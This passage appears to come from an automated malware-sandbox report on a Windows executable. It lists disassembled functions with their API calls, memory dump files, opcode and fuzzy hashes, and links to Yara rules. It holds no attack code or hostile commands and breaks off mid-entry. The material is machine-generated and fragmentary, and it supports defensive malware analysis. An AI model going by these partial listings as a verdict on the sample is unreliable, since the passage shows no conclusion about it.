                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452AE0 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B19
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B21
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1799206407-0
                                                                                                                            • Opcode ID: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
                                                                                                                            • Instruction ID: ab2d8551c2587fa33e08e03b3339d41412f2fea6ae8ede581cb29ed56d474115
                                                                                                                            • Opcode Fuzzy Hash: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
                                                                                                                            • Instruction Fuzzy Hash: DDF0FC71A04708ABCB11EF759D414AEB7E8EB4A32575047B7FC14E3282D7B86E04859C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042323C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3238433803-0
                                                                                                                            • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                            • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                                            • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                            • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E394 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2987862817-0
                                                                                                                            • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                            • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                                            • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                            • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E0E4 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(00000316,0046E17A), ref: 0046E0EE
                                                                                                                            • 76CCE550.OLE32(00499B98,00000000,00000001,00499BA8,?,00000316,0046E17A), ref: 0046E10A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: E550Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1323609852-0
                                                                                                                            • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                            • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                                            • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                            • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004162CA Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004162E1
                                                                                                                            • GetClassInfoA.USER32(00000000,?,?), ref: 004162F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassInfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3534257612-0
                                                                                                                            • Opcode ID: 1299c1a0664136db271893dd0cc50e967199de2eea8caf0295a053f4b6d41932
                                                                                                                            • Instruction ID: 8e3ee469ef83f81d8c71ae4630d2e8c7c449d5c480d74fd2e2a5eda3e874073d
                                                                                                                            • Opcode Fuzzy Hash: 1299c1a0664136db271893dd0cc50e967199de2eea8caf0295a053f4b6d41932
                                                                                                                            • Instruction Fuzzy Hash: BDE012B26015155ED710DBA89D81EE736DCDB08350B210177BE08CA256D364DD008BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047C88B Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                                            • 76CF83B0.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderKnownPath
                                                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                            • API String ID: 3622228125-544719455
                                                                                                                            • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                            • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                                            • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                            • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004508F8 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156039329-0
                                                                                                                            • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                            • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                                                            • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                            • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040625C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2558781224-0
                                                                                                                            • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                                            • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                                                                            • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                                            • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2087232378-0
                                                                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004085DC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                                              • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1658689577-0
                                                                                                                            • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                            • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                                            • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                            • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041FB9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoScroll
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 629608716-0
                                                                                                                            • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                            • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                                            • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                            • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C450 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                                              • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                                              • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3319771486-0
                                                                                                                            • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                            • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                                            • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                            • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00441394 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                            • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                            • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416550 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
